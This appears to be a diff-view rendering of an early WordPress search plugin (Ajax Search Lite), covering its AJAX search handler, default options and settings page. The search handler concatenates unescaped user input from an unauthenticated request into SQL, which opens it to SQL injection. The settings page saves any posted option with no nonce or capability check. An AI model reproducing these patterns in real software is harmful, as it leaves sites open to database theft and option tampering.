97 |
+
* All compatibility issues fixed
|
98 |
+
|
99 |
+
= 1.2 =
|
100 |
+
* Search widget added
|
101 |
+
* Multisite fix
|
102 |
+
|
103 |
+
= 1.1 =
|
104 |
+
* Disappear bugfix
|
105 |
+
* WordPress 3.5 compatible
|
106 |
+
|
107 |
+
|
108 |
+
== Upgrade notice ==
|
109 |
+
* Nothing to say here :)
|
110 |
+
|
111 |
+
|
112 |
+
== Plugin website ==
|
113 |
+
|
114 |
+
`http://wp-dreams.com`
|
search.php
ADDED
@@ -0,0 +1,116 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
<?php
|
2 |
+
add_action('wp_ajax_nopriv_ajaxsearchlite_search', 'ajaxsearchlite_search');
|
3 |
+
add_action('wp_ajax_ajaxsearchlite_search', 'ajaxsearchlite_search');
|
4 |
+
require_once(AJAXSEARCHLITE_PATH."/includes/imagecache.class.php");
|
5 |
+
|
6 |
+
function ajaxsearchlite_search() {
|
7 |
+
global $wpdb;
|
8 |
+
$like = "";
|
9 |
+
$s = trim($_POST['s']);
|
10 |
+
$s= preg_replace( '/\s+/', ' ', $s);
|
11 |
+
if (isset($wpdb->base_prefix)) {
|
12 |
+
$_prefix = $wpdb->base_prefix;
|
13 |
+
} else {
|
14 |
+
$_prefix = $wpdb->prefix;
|
15 |
+
}
|
16 |
+
|
17 |
+
if (get_option('asl_exactonly')!=1) {
|
18 |
+
$_s = explode(" ", $s);
|
19 |
+
}
|
20 |
+
if (isset($_POST['options'])) {
|
21 |
+
parse_str($_POST['options'], $options);
|
22 |
+
}
|
23 |
+
$limit = get_option('asl_maxresults');
|
24 |
+
$not_exactonly = (isset($options['set_exactonly'])?false:true);
|
25 |
+
$searchintitle = (isset($options['set_intitle'])?true:false);
|
26 |
+
$searchincontent = (isset($options['set_incontent'])?true:false);
|
27 |
+
$searchinposts = (isset($options['set_inposts'])?true:false);
|
28 |
+
$searchinpages = (isset($options['set_inpages'])?true:false);
|
29 |
+
|
30 |
+
if ($searchintitle) {
|
31 |
+
if ($not_exactonly) {
|
32 |
+
$sr = implode("%' OR lower($wpdb->posts.post_title) like '%",$_s);
|
33 |
+
$sr = " lower($wpdb->posts.post_title) like '%".$sr."%'";
|
34 |
+
} else {
|
35 |
+
$sr = " lower($wpdb->posts.post_title) like '%".$s."%'";
|
36 |
+
}
|
37 |
+
$like .= $sr;
|
38 |
+
}
|
39 |
+
|
40 |
+
if ($searchincontent) {
|
41 |
+
if ($not_exactonly) {
|
42 |
+
$sr = implode("%' OR lower($wpdb->posts.post_content) like '%",$_s);
|
43 |
+
if ($like!="") {
|
44 |
+
$sr = " OR lower($wpdb->posts.post_content) like '%".$sr."%'";
|
45 |
+
} else {
|
46 |
+
$sr = " lower($wpdb->posts.post_content) like '%".$sr."%'";
|
47 |
+
}
|
48 |
+
} else {
|
49 |
+
if ($like!="") {
|
50 |
+
$sr = " OR lower($wpdb->posts.post_content) like '%".$s."%'";
|
51 |
+
} else {
|
52 |
+
$sr = " lower($wpdb->posts.post_content) like '%".$s."%'";
|
53 |
+
}
|
54 |
+
}
|
55 |
+
$like .= $sr;
|
56 |
+
}
|
57 |
+
|
58 |
+
|
59 |
+
if ($searchinposts) {
|
60 |
+
$where = " $wpdb->posts.post_type='post'";
|
61 |
+
}
|
62 |
+
|
63 |
+
if ($searchinpages) {
|
64 |
+
if ($where!="")
|
65 |
+
$where.= " OR $wpdb->posts.post_type='page'";
|
66 |
+
else
|
67 |
+
$where.= "$wpdb->posts.post_type='page'";
|
68 |
+
}
|
69 |
+
|
70 |
+
if ($where=="") {
|
71 |
+
$where = "$wpdb->posts.post_type=''";
|
72 |
+
}
|
73 |
+
$orderby = get_option('asl_orderby_select');
|
74 |
+
$s=strtolower(addslashes($_POST['s']));
|
75 |
+
$querystr = "
|
76 |
+
SELECT
|
77 |
+
$wpdb->posts.post_title as title,
|
78 |
+
$wpdb->posts.ID as id,
|
79 |
+
$wpdb->posts.post_date as date,
|
80 |
+
$wpdb->posts.post_content as content,
|
81 |
+
$wpdb->posts.post_excerpt as excerpt,
|
82 |
+
$wpdb->users.user_nicename as author
|
83 |
+
FROM $wpdb->posts
|
84 |
+
LEFT JOIN $wpdb->users ON $wpdb->users.ID = $wpdb->posts.post_author
|
85 |
+
LEFT JOIN $wpdb->term_relationships ON $wpdb->posts.ID = $wpdb->term_relationships.object_id
|
86 |
+
LEFT JOIN $wpdb->term_taxonomy ON $wpdb->term_taxonomy.term_taxonomy_id = $wpdb->term_relationships.term_taxonomy_id
|
87 |
+
LEFT JOIN $wpdb->terms ON $wpdb->term_taxonomy.term_id = $wpdb->terms.term_id
|
88 |
+
WHERE
|
89 |
+
($wpdb->posts.post_status='publish' $searchin) AND
|
90 |
+
(".$where.")
|
91 |
+
AND (".$like.")
|
92 |
+
GROUP BY
|
93 |
+
$wpdb->posts.ID
|
94 |
+
ORDER BY ".$wpdb->posts.".".$orderby."
|
95 |
+
LIMIT $limit;
|
96 |
+
";
|
97 |
+
$pageposts = $wpdb->get_results($querystr, OBJECT);
|
98 |
+
foreach ($pageposts as $k=>$v) {
|
99 |
+
$pageposts[$k]->link = get_permalink($v->id);
|
100 |
+
$img = new wpdreamsImageCache($v->content, AJAXSEARCHLITE_PATH.DIRECTORY_SEPARATOR."cache".DIRECTORY_SEPARATOR, 70, 70, 1);
|
101 |
+
$res = $img->get_image();
|
102 |
+
if ($res!='') {
|
103 |
+
$pageposts[$k]->image = plugins_url('/cache/'.$res , __FILE__);
|
104 |
+
}
|
105 |
+
if ($pageposts[$k]->content!='')
|
106 |
+
$pageposts[$k]->content = substr(strip_tags($pageposts[$k]->content), 0, 130)."...";
|
107 |
+
}
|
108 |
+
|
109 |
+
$results = $pageposts;
|
110 |
+
|
111 |
+
print_r(json_encode($results));
|
112 |
+
die();
|
113 |
+
}
|
114 |
+
|
115 |
+
|
116 |
+
?>
|
settings.php
ADDED
@@ -0,0 +1,5 @@
|
|
|
|
|
|
|
|
|
|
|
1 |
+
<div class="wrap" id="wpdreams">
|
2 |
+
<?php
|
3 |
+
require_once(AJAXSEARCHLITE_PATH."/settings/search.php");
|
4 |
+
?>
|
5 |
+
</div>
|
settings/default_options.php
ADDED
@@ -0,0 +1,68 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
<?php
|
2 |
+
/* Default options */
|
3 |
+
$_search_default = array();
|
4 |
+
|
5 |
+
$_search_default['asl_theme'] = "
|
6 |
+
Minimal|style.css;
|
7 |
+
Dashed Blue|style-dashedblue.css||
|
8 |
+
style.css
|
9 |
+
";
|
10 |
+
$_search_default['asl_theme_select'] = "style.css";
|
11 |
+
|
12 |
+
$_search_default['asl_searchinposts'] = 1;
|
13 |
+
$_search_default['asl_searchinpages'] = 1;
|
14 |
+
$_search_default['asl_searchintitle'] = 1;
|
15 |
+
$_search_default['asl_searchincontent'] = 1;
|
16 |
+
$_search_default['asl_searchinexcerpt'] = 1;
|
17 |
+
$_search_default['asl_exactonly'] = 0;
|
18 |
+
|
19 |
+
$_search_default['asl_charcount'] = 3;
|
20 |
+
$_search_default['asl_maxresults'] = 30;
|
21 |
+
$_search_default['asl_itemscount'] = 4;
|
22 |
+
|
23 |
+
$_search_default['asl_orderby'] = "
|
24 |
+
Title descending|post_title DESC;
|
25 |
+
Title ascending|post_title ASC;
|
26 |
+
Date descending|post_date DESC;
|
27 |
+
Date ascending|post_date ASC||
|
28 |
+
post_date DESC
|
29 |
+
";
|
30 |
+
$_search_default['asl_orderby_select'] = "post_date DESC";
|
31 |
+
|
32 |
+
|
33 |
+
/* Frontend search settings Options */
|
34 |
+
$_search_default['asl_showexactmatches'] = 1;
|
35 |
+
$_search_default['asl_showsearchinposts'] = 1;
|
36 |
+
$_search_default['asl_showsearchinpages'] = 1;
|
37 |
+
$_search_default['asl_showsearchintitle'] = 1;
|
38 |
+
$_search_default['asl_showsearchincontent'] = 1;
|
39 |
+
$_search_default['asl_showsearchinexcerpt'] = 1;
|
40 |
+
|
41 |
+
$_search_default['asl_exactmatchestext'] = "Exact matches only";
|
42 |
+
$_search_default['asl_searchinpoststext'] = "Search in posts";
|
43 |
+
$_search_default['asl_searchinpagestext'] = "Search in pages";
|
44 |
+
$_search_default['asl_searchintitletext'] = "Search in title";
|
45 |
+
$_search_default['asl_searchincontenttext'] = "Search in content";
|
46 |
+
$_search_default['asl_searchinexcerpttext'] = "Search in excerpt";
|
47 |
+
|
48 |
+
$_search_default['asl_resultareaclickable'] = 0;
|
49 |
+
$_search_default['asl_showauthor'] = 1;
|
50 |
+
$_search_default['asl_showdate'] = 1;
|
51 |
+
$_search_default['asl_showdescription'] = 1;
|
52 |
+
$_search_default['asl_descriptionlength'] = 100;
|
53 |
+
$_search_default['asl_noresultstext'] = "No results!";
|
54 |
+
$_search_default['asl_didyoumeantext'] = "Did you mean:";
|
55 |
+
$_search_default['asl_highlight'] = 1;
|
56 |
+
$_search_default['asl_highlightwholewords'] = 1;
|
57 |
+
|
58 |
+
$_search_default['asl_showauthor'] = 1;
|
59 |
+
$_search_default['asl_showdate'] = 1;
|
60 |
+
$_search_default['asl_showdescription'] = 1;
|
61 |
+
$_search_default['asl_descriptionlength'] = 130;
|
62 |
+
|
63 |
+
/* Save the defaul options if not exist */
|
64 |
+
foreach($_search_default as $key=>$value) {
|
65 |
+
if (get_option($key)===false)
|
66 |
+
update_option($key, $value);
|
67 |
+
}
|
68 |
+
?>
|
settings/search.php
ADDED
@@ -0,0 +1,119 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
<?php ob_start(); ?>
|
2 |
+
<fieldset>
|
3 |
+
<legend>Genearal Options</legend>
|
4 |
+
<div class="item"><?php
|
5 |
+
$o = new wpdreamsSelect("asl_theme", "Theme", postval_or_getoption('asl_theme'));
|
6 |
+
?></div>
|
7 |
+
<div class="item">
|
8 |
+
<?php
|
9 |
+
$o = new wpdreamsYesNo("asl_searchinposts", "Search in posts?", postval_or_getoption('asl_searchinposts'));
|
10 |
+
?>
|
11 |
+
</div>
|
12 |
+
<div class="item">
|
13 |
+
<?php
|
14 |
+
$o = new wpdreamsYesNo("asl_searchinpages", "Search in pages?", postval_or_getoption('asl_searchinpages'));
|
15 |
+
?>
|
16 |
+
</div>
|
17 |
+
<div class="item">
|
18 |
+
<?php
|
19 |
+
$o = new wpdreamsYesNo("asl_searchintitle", "Search in title?", postval_or_getoption('asl_searchintitle'));
|
20 |
+
?>
|
21 |
+
</div>
|
22 |
+
<div class="item">
|
23 |
+
<?php
|
24 |
+
$o = new wpdreamsYesNo("asl_searchincontent", "Search in content?", postval_or_getoption('asl_searchincontent'));
|
25 |
+
?>
|
26 |
+
</div>
|
27 |
+
|
28 |
+
<div class="item">
|
29 |
+
<?php
|
30 |
+
$o = new wpdreamsYesNo("asl_exactonly", "Show exact matches only?", postval_or_getoption('asl_exactonly'));
|
31 |
+
?>
|
32 |
+
</div>
|
33 |
+
<div class="item"><?php
|
34 |
+
$o = new wpdreamsSelect("asl_orderby", "Result ordering", postval_or_getoption('asl_orderby'));
|
35 |
+
?></div>
|
36 |
+
<div class="item"><?php
|
37 |
+
$o = new wpdreamsTextSmall("asl_charcount", "Minimal character count to trigger search", postval_or_getoption('asl_charcount'), array( array("func"=>"ctype_digit", "op"=>"eq", "val"=>true) ));
|
38 |
+
?></div>
|
39 |
+
<div class="item"><?php
|
40 |
+
$o = new wpdreamsTextSmall("asl_maxresults", "Max. results", postval_or_getoption('asl_maxresults'), array( array("func"=>"ctype_digit", "op"=>"eq", "val"=>true) ));
|
41 |
+
?></div>
|
42 |
+
<div class="item"><?php
|
43 |
+
$o = new wpdreamsTextSmall("asl_itemscount", "Results box viewport (in item numbers)", postval_or_getoption('asl_itemscount'), array( array("func"=>"ctype_digit", "op"=>"eq", "val"=>true) ));
|
44 |
+
?></div>
|
45 |
+
</fieldset>
|
46 |
+
<fieldset>
|
47 |
+
<legend>Frontend Search Settings options</legend>
|
48 |
+
<div class="item" style="text-align:center;">
|
49 |
+
The default values of the checkboxes on the frontend are the values set above.
|
50 |
+
</div>
|
51 |
+
<div class="item">
|
52 |
+
<?php
|
53 |
+
$o = new wpdreamsYesNo("asl_showexactmatches", "Show exact matches selector?", postval_or_getoption('asl_showexactmatches'));
|
54 |
+
$o = new wpdreamsText("asl_exactmatchestext", "Text", postval_or_getoption('asl_exactmatchestext'));
|
55 |
+
?></div>
|
56 |
+
<div class="item">
|
57 |
+
<?php
|
58 |
+
$o = new wpdreamsYesNo("asl_showsearchinposts", "Show search in posts selector?", postval_or_getoption('asl_showsearchinposts'));
|
59 |
+
$o = new wpdreamsText("asl_searchinpoststext", "Text", postval_or_getoption('asl_searchinpoststext'));
|
60 |
+
?></div>
|
61 |
+
<div class="item">
|
62 |
+
<?php
|
63 |
+
$o = new wpdreamsYesNo("asl_showsearchinpages", "Show search in pages selector?", postval_or_getoption('asl_showsearchinpages'));
|
64 |
+
$o = new wpdreamsText("asl_searchinpagestext", "Text", postval_or_getoption('asl_searchinpagestext'));
|
65 |
+
?></div>
|
66 |
+
</fieldset>
|
67 |
+
<fieldset>
|
68 |
+
<legend>Layout Options</legend>
|
69 |
+
<div class="item">
|
70 |
+
<?php
|
71 |
+
$o = new wpdreamsYesNo("asl_resultareaclickable", "Make the whole result area clickable?", postval_or_getoption('asl_resultareaclickable'));
|
72 |
+
?>
|
73 |
+
</div>
|
74 |
+
<div class="item">
|
75 |
+
<?php
|
76 |
+
$o = new wpdreamsYesNo("asl_showauthor", "Show author in results?", postval_or_getoption('asl_showauthor'));
|
77 |
+
?>
|
78 |
+
</div>
|
79 |
+
<div class="item">
|
80 |
+
<?php
|
81 |
+
$o = new wpdreamsYesNo("asl_showdate", "Show date in results?", postval_or_getoption('asl_showdate'));
|
82 |
+
?>
|
83 |
+
</div>
|
84 |
+
</fieldset>
|
85 |
+
<?php $_r = ob_get_clean(); ?>
|
86 |
+
<?php
|
87 |
+
$updated = false;
|
88 |
+
$err = ((wpdreamsType::getErrorNum()==0)?false:true);
|
89 |
+
|
90 |
+
if (isset($_POST) && !$err) {
|
91 |
+
foreach($_POST as $key=>$value) {
|
92 |
+
if (is_string($key) && (strpos($key, 'asl_')==0)) {
|
93 |
+
update_option($key, $value);
|
94 |
+
$updated = true;
|
95 |
+
}
|
96 |
+
}
|
97 |
+
}
|
98 |
+
?>
|
99 |
+
<div class="wpdreams-slider moveable">
|
100 |
+
<div class="slider-info">
|
101 |
+
<span>
|
102 |
+
<label class="shortcode">Search shortcode:</label>
|
103 |
+
<input type="text" class="shortcode" value="[wpdreams_ajaxsearchlite]" readonly="readonly" />
|
104 |
+
<?php new wpdreamsInfo("Copy this shortcode to any page or post!"); ?>
|
105 |
+
<label class="shortcode">Search shortcode for templates:</label>
|
106 |
+
<input type="text" class="shortcode" value="echo do_shortcode('[wpdreams_ajaxsearchlite');" readonly="readonly" />
|
107 |
+
<?php new wpdreamsInfo("Copy this shortcode into your template!"); ?>
|
108 |
+
</span>
|
109 |
+
</div>
|
110 |
+
<hr />
|
111 |
+
<form name="polaroid_slider_<?php echo $search['id']; ?>" action="" method="POST">
|
112 |
+
<?php if($err): ?><div class='errorMsg'>Error in settings, check the values!</div><?php endif; ?>
|
113 |
+
<?php if($updated): ?><div class='successMsg'>Settings succesfully updated!</div><?php endif; ?>
|
114 |
+
<?php print $_r; ?>
|
115 |
+
<div class="item">
|
116 |
+
<input name="submit_<?php echo $search['id']; ?>" type="submit" value="Save this search!" />
|
117 |
+
</div>
|
118 |
+
</form>
|
119 |
+
</div>
|
settings/types.class.php
ADDED
@@ -0,0 +1,1406 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
<?php
|
2 |
+
if (!class_exists("wpdreamsType")) {
|
3 |
+
class wpdreamsType {
|
4 |
+
protected static $_instancenumber = 0;
|
5 |
+
protected static $_errors = 0;
|
6 |
+
protected static $_globalerrormsg = "Only integer values are accepted!";
|
7 |
+
function __construct($name, $label, $data, $constraints = null, $errormsg = "") {
|
8 |
+
$this->name = $name;
|
9 |
+
$this->label = $label;
|
10 |
+
$this->constraints = $constraints;
|
11 |
+
$this->errormsg = $errormsg;
|
12 |
+
$this->data = $data;
|
13 |
+
$this->selected = $data;
|
14 |
+
$this->isError = false;
|
15 |
+
self::$_instancenumber++;
|
16 |
+
$this->getType();
|
17 |
+
}
|
